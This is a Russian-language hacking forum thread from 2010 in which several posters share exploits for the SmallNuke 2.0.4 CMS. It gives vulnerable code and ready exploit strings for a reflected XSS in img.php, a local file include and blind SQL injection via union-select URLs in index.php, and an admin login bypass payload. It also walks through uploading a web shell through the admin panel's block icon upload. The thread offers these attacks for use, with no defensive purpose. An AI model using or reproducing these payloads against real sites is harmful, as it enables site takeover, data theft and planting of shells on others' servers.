Старый 07.07.2010, 11:14   #1
t3zo
 
Аватар для t3zo
 
Регистрация: 07.07.2010
Сообщений: 1
Репутация: 0
По умолчанию Уязвимости SmallNuke

SmallNuke 2.0.4

уязвимый
сценарий img.php
Параметр img_url
47 строка
Код:
<center><a href="javascript:window.close()"><img alt="Click to close this window!" name="LargeImg" src="<?php echo $_GET['img_url']?>" border="0"/></a></center>
sploit
xak/smallnuke/img.php?img_url=[XSS]

(c) t3zo

Последний раз редактировалось Jokester; 07.07.2010 в 13:25..
t3zo вне форума   Ответить с цитированием
Старый 07.07.2010, 13:18   #2
Grey
 
Аватар для Grey
 
Регистрация: 30.06.2010
Сообщений: 38
По умолчанию

SmallNuke <= 2.0.4 (Локальный инклуд файлов / Слепая SQL инъекция)

Уязвимость в файле: inc/modules.php

Код:
$sql = "SELECT * FROM ".SN_TABLE_MODULES." WHERE title='$go'";
Данные из запроса подставляются в include()
Фильтрация не достаточная - используется уязвимая функция ereg().

Код:
http://site.com/index.php?go=1%00'+and+1=2+union+select+1,'../robots.txt%00',3,4,5,6,7,8,9,10,11,12--+1
Ну и разумеется инъекцию можно использовать просто как слепую:

Код:
http://site.com/index.php?go=1%00'+and+1=2+union+select+1,'../robots.txt%00',3,4,5,6,7,8,9,10,11,12+from+sn_admins+where+login='grey'--+1
Соответственно если файл инклудится, то запрос выполнен верно, если не подключается - не верно.

2008 © Grey

Последний раз редактировалось Grey; 07.07.2010 в 13:21..
Grey вне форума   Ответить с цитированием
Старый 07.07.2010, 15:07   #3
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

SmallNuke v. 2.0.4 Full (самая скачиваемая) льем шелл из админки:

В админке идем в

Блоки->Выбираем например "Кто на сайте"->Править->Иконка

и льем шелл, файло льется, но в админке не отображается, можно посмотреть на главной странице адрес шелла:



будет примерно такой:

Код:
http://localhost/snuke/www/images/block/1278503889_wso2.php
копируем шелл, удаляем иконку (или возвращаем на место старую)
Pashkela вне форума   Ответить с цитированием
Старый 09.07.2010, 12:00   #4
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию

SmallNuke v. 2.0.4 (Возможно и другие версии)
http://smallnuke.com/index.php?go=Files&in=cat&id=1
"Powered by Smallnuke"

Blind SQL-Inj / Обход авторизации

Уязвимый скрипт: /admin/admin.php


PHP код:
if (isset ($_POST['enter_admin'])) {
   
$admin_name = isset ($_POST['admin_name']) ? substr (str_replace ("\\'""''"str_replace ("'""\'"rtrim (htmlspecialchars (str_replace ("\'""'"trim (strip_tags ($_POST['admin_name'])))), "\\"))), 015) : '';
   
$code_password = isset ($_POST['admin_password']) ? md5 (trim ($_POST['admin_password'])) : '';
   if (
'' == $admin_name || '' == $code_password || md5('') == $code_password) { header ('Location: admin.php'); exit; }
   
$sql "SELECT admin_id, login, password FROM ".SN_TABLE_ADMINS." WHERE login='$admin_name' AND password='$code_password'";
   
$result $db->sql_query ($sql);
   
$row $db->sql_fetchrow ($result);
   if (
$row) { 
Сплоит:
Код:
login: 1\\'or(1)#
pass: любой
BlackFan вне форума   Ответить с цитированием
Старый 13.08.2010, 06:46   #5
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
SmallNuke v. 2.0.4 Full (самая скачиваемая) льем шелл из админки:
А ты сам пробывал зайти по ссылке? Сразу 403 рубит. Извеняюсь за оффтоп.
__________________
Twitter - @Ctacok
Ctacok вне форума   Ответить с цитированием
Ответ

Метки
lfi, sql-inj, xss

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot